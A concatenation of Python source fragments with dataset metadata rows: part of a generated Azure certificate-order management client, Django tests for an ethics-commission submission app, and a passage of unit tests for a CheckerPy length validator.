<azure.mgmt.web.models.RenewCertificateOrderRequest>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/renew'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(renew_certificate_order_request, 'RenewCertificateOrderRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def retrieve_certificate_actions(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Retrieve the list of certificate actions.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate order name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: list of :class:`CertificateOrderAction
<azure.mgmt.web.models.CertificateOrderAction>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveCertificateActions'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[CertificateOrderAction]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def retrieve_certificate_email_history(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Retrive email history.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate order name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: list of :class:`CertificateEmail
<azure.mgmt.web.models.CertificateEmail>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveEmailHistory'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[CertificateEmail]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def resend_certificate_email(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Resend certificate email.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate order name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/resendEmail'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def verify_domain_ownership(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Verify domain ownership for this certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate order name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/verifyDomainOwnership'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| 47.087832
| 188
| 0.674704
| 5,338
| 51,467
| 6.29674
| 0.038966
| 0.038379
| 0.048554
| 0.034273
| 0.943086
| 0.943086
| 0.943086
| 0.936392
| 0.934993
| 0.934993
| 0
| 0.003101
| 0.229331
| 51,467
| 1,092
| 189
| 47.130952
| 0.844317
| 0.268813
| 0
| 0.887067
| 0
| 0.007286
| 0.200113
| 0.122609
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034608
| false
| 0
| 0.007286
| 0
| 0.105647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
040b001f6d6083cf6e1cb1e63d77370e9a5f9702
| 16,966
|
py
|
Python
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 9
|
2017-02-13T18:17:13.000Z
|
2020-11-21T20:15:54.000Z
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 2
|
2021-05-20T14:26:47.000Z
|
2021-05-20T14:26:48.000Z
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 4
|
2017-04-02T18:48:59.000Z
|
2021-11-23T15:40:35.000Z
|
import os
from django.utils import timezone
from ecs.core.models import Submission, SubmissionForm, EthicsCommission, Investigator
from ecs.documents.models import Document, DocumentType
from ecs.utils.testcases import EcsTestCase
from ecs.users.utils import get_or_create_user, create_user
TEST_PDF = os.path.join(os.path.dirname(__file__), 'data', 'menschenrechtserklaerung.pdf')
def attach_document(submission_form, filelike, name, doctype_identifier, mimetype='application/pdf', version="1", date=None):
doctype = DocumentType.objects.get(identifier=doctype_identifier)
date = date or timezone.now()
doc = Document.objects.create(version=version, date=date, name=name,
doctype=doctype, mimetype=mimetype, parent_object=submission_form)
doc.store(filelike)
submission_form.documents.add(doc)
return doc
def create_submission_form(ec_number=None, presenter=None):
presenter = presenter or get_or_create_user('test_presenter@example.com')[0]
sub = Submission(ec_number=ec_number, presenter=presenter, susar_presenter=presenter)
sub.save()
sform = SubmissionForm.objects.create(
submission = sub,
project_title="High Risk Test Study",
eudract_number="2010-002323-99",
sponsor_name="testsponsor",
sponsor_address="mainstreet 1",
sponsor_zip_code="2323",
sponsor_city="Wien",
sponsor_phone="+4309876543456789",
sponsor_fax="+430987654345678",
sponsor_email="sponsor@example.com",
invoice_name="",
invoice_address="",
invoice_zip_code="",
invoice_city="",
invoice_phone="",
invoice_fax="",
invoice_email="",
invoice_uid="",
project_type_non_reg_drug=True,
project_type_reg_drug=False,
project_type_reg_drug_within_indication=False,
project_type_reg_drug_not_within_indication=False,
project_type_medical_method=False,
project_type_medical_device=False,
project_type_medical_device_with_ce=False,
project_type_medical_device_without_ce=False,
project_type_medical_device_performance_evaluation=False,
project_type_basic_research=False,
project_type_genetic_study=False,
project_type_register=False,
project_type_biobank=False,
project_type_retrospective=False,
project_type_questionnaire=False,
project_type_education_context=None,
project_type_misc=None,
specialism="Pädiatrische Onkologie / Immunologie",
pharma_checked_substance="",
pharma_reference_substance="",
medtech_checked_product="",
medtech_reference_substance="",
clinical_phase="III",
already_voted=True,
subject_count=175,
subject_minage=0,
subject_maxage=21,
subject_noncompetents=True,
subject_males=True,
subject_females=True,
subject_childbearing=True,
subject_duration="48 months",
subject_duration_active="12 months",
subject_duration_controls="36 months",
subject_planned_total_duration="99",
substance_preexisting_clinical_tries=True,
substance_p_c_t_phase="III",
substance_p_c_t_period="to long",
substance_p_c_t_application_type="IV in children",
substance_p_c_t_gcp_rules=True,
substance_p_c_t_final_report=True,
medtech_product_name="",
medtech_manufacturer="",
medtech_certified_for_exact_indications=False,
medtech_certified_for_other_indications=False,
medtech_ce_symbol=False,
medtech_manual_included=False,
medtech_technical_safety_regulations="",
medtech_departure_from_regulations="",
insurance_name="Insurance",
insurance_address="insurancestreet 1",
insurance_phone="+43123456",
insurance_contract_number="",
insurance_validity="",
additional_therapy_info="long blabla",
german_project_title="bla bla bla",
german_summary="bla bla bla",
german_preclinical_results="bla bla bla",
german_primary_hypothesis="bla bla bla",
german_inclusion_exclusion_crit="bla bla bla",
german_ethical_info="bla bla bla",
german_protected_subjects_info="bla bla bla",
german_recruitment_info="bla bla bla",
german_consent_info="bla bla bla",
german_risks_info="bla bla bla",
german_benefits_info="bla bla bla",
german_relationship_info="bla bla bla",
german_concurrent_study_info="bla bla bla",
german_sideeffects_info="bla bla bla",
german_statistical_info="bla bla bla",
german_dataprotection_info="bla bla bla",
german_aftercare_info="bla bla bla",
german_payment_info="bla bla bla",
german_abort_info="bla bla bla",
german_dataaccess_info="bla bla bla",
german_financing_info="bla bla bla",
german_additional_info="bla bla bla",
study_plan_blind=0,
study_plan_observer_blinded=False,
study_plan_randomized=True,
study_plan_parallelgroups=True,
study_plan_controlled=True,
study_plan_cross_over=False,
study_plan_placebo=False,
study_plan_factorized=False,
study_plan_pilot_project=False,
study_plan_equivalence_testing=False,
study_plan_misc=None,
study_plan_number_of_groups="two sequential randomisations, each with 2 arms",
study_plan_stratification="Age, Stage, National Groups",
study_plan_sample_frequency=None,
study_plan_primary_objectives="Event Free Survival",
study_plan_null_hypothesis=False,
study_plan_alternative_hypothesis="my thesis",
study_plan_secondary_objectives="secondary objective",
study_plan_alpha="0.03",
study_plan_power="0.75",
study_plan_statalgorithm="blabla",
study_plan_multiple_test_correction_algorithm="",
study_plan_dropout_ratio="0",
study_plan_population_intention_to_treat=True,
study_plan_population_per_protocol=False,
study_plan_abort_crit="Peto",
study_plan_planned_statalgorithm="log rank test",
study_plan_dataquality_checking="None",
study_plan_datamanagement="Datamanagement",
study_plan_biometric_planning="Mag. rer.soc.oec. Jane Doe",
study_plan_statistics_implementation="Mag. rer.soc.oec. Jane Doe / Statistikerin",
#study_plan_dataprotection_anonalgoritm="Electronically generated unique patient number within SIOPEN-R-Net",
study_plan_dataprotection_anonalgoritm="to long",
study_plan_dataprotection_dvr="",
study_plan_dataprotection_reason="",
submitter_contact_gender="f",
submitter_contact_first_name="Jane",
submitter_contact_title="Univ. Doz. Dr.",
submitter_contact_last_name="Doe",
submitter_organisation="Organisation",
submitter_jobtitle="jobtitle",
submitter_is_coordinator=True,
submitter_is_main_investigator=False,
submitter_is_sponsor=False,
submitter_is_authorized_by_sponsor=False,
substance_registered_in_countries=[],
substance_p_c_t_countries=['AT', 'DE', 'US'],
presenter=presenter,
)
with open(TEST_PDF, 'rb') as f:
attach_document(sform, f, 'protocol.pdf', 'protocol')
ek1 = EthicsCommission(name='EK von Neverland')
ek1.save()
Investigator.objects.create(submission_form=sform, main=True, contact_last_name="Univ. Doz. Dr. Joseph doe", subject_count=1, ethics_commission=ek1)
sform.render_pdf_document()
return sform
class SubmissionFormTest(EcsTestCase):
'''Tests for creating a submission form.
Basic Tests for the modules Submission, SubmissionForm EthicsCommission, Investigator.
'''
def test_creation(self):
'''Tests if a submission form can be created and saved.
Also tests creation of an EthicsCommission and an Investigator and
attaching the submissionform to the created EC and the Investigator.
If a pdf of the submission form can be rendered is tested aswell.
'''
presenter=get_or_create_user('test_presenter@example.com')[0]
sub = Submission(presenter=presenter, susar_presenter=presenter)
sub.save()
sform = SubmissionForm.objects.create(
submission = sub,
project_title="High Risk Test Study",
eudract_number="2010-002323-99",
sponsor_name="testsponsor",
sponsor_address="mainstreet 1",
sponsor_zip_code="2323",
sponsor_city="Wien",
sponsor_phone="+4309876543456789",
sponsor_fax="+430987654345678",
sponsor_email="sponsor@example.com",
invoice_name="",
invoice_address="",
invoice_zip_code="",
invoice_city="",
invoice_phone="",
invoice_fax="",
invoice_email="",
invoice_uid="",
project_type_non_reg_drug=True,
project_type_reg_drug=False,
project_type_reg_drug_within_indication=False,
project_type_reg_drug_not_within_indication=False,
project_type_medical_method=False,
project_type_medical_device=False,
project_type_medical_device_with_ce=False,
project_type_medical_device_without_ce=False,
project_type_medical_device_performance_evaluation=False,
project_type_basic_research=False,
project_type_genetic_study=False,
project_type_register=False,
project_type_biobank=False,
project_type_retrospective=False,
project_type_questionnaire=False,
project_type_education_context=None,
project_type_misc=None,
specialism="Pädiatrische Onkologie / Immunologie",
pharma_checked_substance="",
pharma_reference_substance="",
medtech_checked_product="",
medtech_reference_substance="",
clinical_phase="III",
already_voted=True,
subject_count=175,
subject_minage=0,
subject_maxage=21,
subject_noncompetents=True,
subject_males=True,
subject_females=True,
subject_childbearing=True,
subject_duration="48 months",
subject_duration_active="12 months",
subject_duration_controls="36 months",
subject_planned_total_duration="99",
substance_preexisting_clinical_tries=True,
substance_p_c_t_phase="III",
substance_p_c_t_period="to long",
substance_p_c_t_application_type="IV in children",
substance_p_c_t_gcp_rules=True,
substance_p_c_t_final_report=True,
medtech_product_name="",
medtech_manufacturer="",
medtech_certified_for_exact_indications=False,
medtech_certified_for_other_indications=False,
medtech_ce_symbol=False,
medtech_manual_included=False,
medtech_technical_safety_regulations="",
medtech_departure_from_regulations="",
insurance_name="Insurance",
insurance_address="insurancestreet 1",
insurance_phone="+43123456",
insurance_contract_number="",
insurance_validity="",
additional_therapy_info="long blabla",
german_project_title="bla bla bla",
german_summary="bla bla bla",
german_preclinical_results="bla bla bla",
german_primary_hypothesis="bla bla bla",
german_inclusion_exclusion_crit="bla bla bla",
german_ethical_info="bla bla bla",
german_protected_subjects_info="bla bla bla",
german_recruitment_info="bla bla bla",
german_consent_info="bla bla bla",
german_risks_info="bla bla bla",
german_benefits_info="bla bla bla",
german_relationship_info="bla bla bla",
german_concurrent_study_info="bla bla bla",
german_sideeffects_info="bla bla bla",
german_statistical_info="bla bla bla",
german_dataprotection_info="bla bla bla",
german_aftercare_info="bla bla bla",
german_payment_info="bla bla bla",
german_abort_info="bla bla bla",
german_dataaccess_info="bla bla bla",
german_financing_info="bla bla bla",
german_additional_info="bla bla bla",
study_plan_blind=0,
study_plan_observer_blinded=False,
study_plan_randomized=True,
study_plan_parallelgroups=True,
study_plan_controlled=True,
study_plan_cross_over=False,
study_plan_placebo=False,
study_plan_factorized=False,
study_plan_pilot_project=False,
study_plan_equivalence_testing=False,
study_plan_misc=None,
study_plan_number_of_groups="two sequential randomisations, each with 2 arms",
study_plan_stratification="Age, Stage, National Groups",
study_plan_sample_frequency=None,
study_plan_primary_objectives="Event Free Survival",
study_plan_null_hypothesis=False,
study_plan_alternative_hypothesis="my thesis",
study_plan_secondary_objectives="secondary objective",
study_plan_alpha="0.03",
study_plan_power="0.75",
study_plan_statalgorithm="blabla",
study_plan_multiple_test_correction_algorithm="",
study_plan_dropout_ratio="0",
study_plan_population_intention_to_treat=True,
study_plan_population_per_protocol=False,
study_plan_abort_crit="Peto",
study_plan_planned_statalgorithm="log rank test",
study_plan_dataquality_checking="None",
study_plan_datamanagement="Datamanagement",
study_plan_biometric_planning="Mag. rer.soc.oec. Jane Doe",
study_plan_statistics_implementation="Mag. rer.soc.oec. Jane Doe / Statistikerin",
#study_plan_dataprotection_anonalgoritm="Electronically generated unique patient number within SIOPEN-R-Net",
study_plan_dataprotection_anonalgoritm="to long",
study_plan_dataprotection_dvr="",
study_plan_dataprotection_reason="",
submitter_contact_gender="f",
submitter_contact_first_name="Jane",
submitter_contact_title="Univ. Doz. Dr.",
submitter_contact_last_name="Doe",
submitter_organisation="Organisation",
submitter_jobtitle="jobtitle",
submitter_is_coordinator=True,
submitter_is_main_investigator=False,
submitter_is_sponsor=False,
submitter_is_authorized_by_sponsor=False,
substance_registered_in_countries=[],
substance_p_c_t_countries=['AT', 'DE', 'US'],
presenter=presenter,
)
# normal way would be to fetch one, but the test database does not contain the data rows :(
ek1 = EthicsCommission(name='EK von Neverland')
ek1.save()
Investigator.objects.create(submission_form=sform, main=True, contact_last_name="Univ. Doz. Dr. Joseph doe", subject_count=1, ethics_commission=ek1)
sform.render_pdf_document()
class SubmissionAttachUserTest(EcsTestCase):
'''Tests for attaching users to a submission in different roles.
'''
def setUp(self):
self.email = 'foobar@example.com'
self.user = create_user(self.email)
self.sender = create_user('root@example.com')
self.sf = create_submission_form()
self.sf.sponsor_email = self.email
self.sf.investigator_email = self.email
self.sf.submitter_email = self.email
self.user.save()
self.sender.save();
self.sf.save()
def test_submission_attach_user(self):
'''Tests if a user can be attached to a study as submitter and as sponsor.'''
for x in ('submitter', 'sponsor'):
submission_forms = SubmissionForm.objects.filter(**{'{0}_email'.format(x): self.user.email})
for sf in submission_forms:
setattr(sf, x, self.user)
sf.save()
investigator_by_email = Investigator.objects.filter(email=self.user.email)
for inv in investigator_by_email:
inv.user = self.user
inv.save()
self.sf = SubmissionForm.objects.get(project_title="High Risk Test Study")
self.assertEqual(self.sf.sponsor, self.user)
self.assertEqual(self.sf.submitter, self.user)
def tearDown(self):
self.user.delete()
| 43.280612
| 156
| 0.671284
| 1,902
| 16,966
| 5.604101
| 0.196109
| 0.049536
| 0.037152
| 0.059105
| 0.810864
| 0.807111
| 0.804391
| 0.804391
| 0.804391
| 0.804391
| 0
| 0.013454
| 0.246493
| 16,966
| 391
| 157
| 43.391304
| 0.820322
| 0.04898
| 0
| 0.845714
| 0
| 0
| 0.116084
| 0.004979
| 0
| 0
| 0
| 0
| 0.005714
| 1
| 0.017143
| false
| 0
| 0.017143
| 0
| 0.045714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04119c10045cdbb307cbfbb8c52807ef4335c621
| 33,884
|
py
|
Python
|
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | 1
|
2018-01-12T19:20:51.000Z
|
2018-01-12T19:20:51.000Z
|
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
checkerpy/tests/validators/one/test_justlen.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
import logging
import unittest as ut
from collections import deque, defaultdict, OrderedDict
from ....validators.one import JustLen
from ....exceptions import LenError, IntError, CallableError
from ....types.one import _ITERABLES
from ....types.weak import _LIKE_ITERABLES
from ....functional import CompositionOf
class TestJustLenSpcification(ut.TestCase):
def test_error_on_one_length_not_convertible_to_int(self):
err_msg = ('Could not convert given length f '
'with type str to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length='foo')
self.assertEqual(str(err.exception), err_msg)
def test_error_on_one_of_two_lengths_not_convertible_to_int(self):
err_msg = ('Could not convert given length bar'
' with type str to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=(3, 'bar'))
self.assertEqual(str(err.exception), err_msg)
def test_error_on_deque_not_convertible_to_int(self):
err_msg = ('Could not convert given length '
'deque([1]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[deque([1])])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_frozenset_not_convertible_to_int(self):
err_msg = ('Could not convert given length '
'frozenset({1}) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[frozenset([1])])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_ordered_dict_not_convertible_to_int(self):
length = OrderedDict({1: 1})
err_msg = ('Could not convert given length '
'OrderedDict([(1, 1)]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_defaultdict_not_convertible_to_int(self):
length = defaultdict(int, {1: 1})
err_msg = ("Could not convert given length defaultdict(<class 'int'>,"
" {1: 1}) to required type int!")
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_dict_keys_not_convertible_to_int(self):
length = {1: 1}
err_msg = ('Could not convert given length '
'dict_keys([1]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.keys()])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_ordered_dict_keys_not_convertible_to_int(self):
length = OrderedDict({1: 1})
err_msg = ('Could not convert given length '
'odict_keys([1]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.keys()])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_dict_values_not_convertible_to_int(self):
length = {1: 1}
err_msg = ('Could not convert given length '
'dict_values([1]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.values()])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_ordered_dict_values_not_convertible_to_int(self):
length = OrderedDict({1: 1})
err_msg = ('Could not convert given length '
'odict_values([1]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.values()])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_dict_items_not_convertible_to_int(self):
length = {1: 1}
err_msg = ('Could not convert given length '
'dict_items([(1, 1)]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.items()])
self.assertEqual(str(err.exception), err_msg)
def test_error_on_ordered_dict_items_not_convertible_to_int(self):
length = OrderedDict({1: 1})
err_msg = ('Could not convert given length '
'odict_items([(1, 1)]) to required type int!')
with self.assertRaises(IntError) as err:
_ = JustLen([1, 2], length=[length.items()])
self.assertEqual(str(err.exception), err_msg)
class TestJustLen(ut.TestCase):
def test_error_on_invalid_unnamed_argument(self):
log_msg = ['ERROR:root:Length of int 1 cannot be determined!']
err_msg = 'Length of int 1 cannot be determined!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(1, length=4)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_invalid_named_argument(self):
log_msg = ['ERROR:root:Length of int test cannot be determined!']
err_msg = 'Length of int test cannot be determined!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(2, 'test', length=4)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_str(self):
out = JustLen('test', length=4)
self.assertIsInstance(out, str)
self.assertEqual(out, 'test')
def test_error_on_length_of_str_not_in_lengths(self):
log_msg = ['ERROR:root:Length of str foo '
'must be one of (4, 5), not 3!']
err_msg = 'Length of str foo must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('foo', length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_str_wrong_length(self):
log_msg = ['ERROR:root:Length of str bar must be 6, not 3!']
err_msg = 'Length of str bar must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('bar', length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_str_wrong_length(self):
log_msg = ['ERROR:root:Length of str test must be 7, not 3!']
err_msg = 'Length of str test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen('baz', 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_tuple(self):
out = JustLen((1, 2), length=2)
self.assertTupleEqual(out, (1, 2))
def test_error_on_length_of_tuple_not_in_lengths(self):
log_msg = ['ERROR:root:Length of tuple (1, 2, 3)'
' must be one of (4, 5), not 3!']
err_msg = 'Length of tuple (1, 2, 3) must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_tuple_wrong_length(self):
log_msg = ['ERROR:root:Length of tuple (1, 2, 3) must be 6, not 3!']
err_msg = 'Length of tuple (1, 2, 3) must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), length=6)
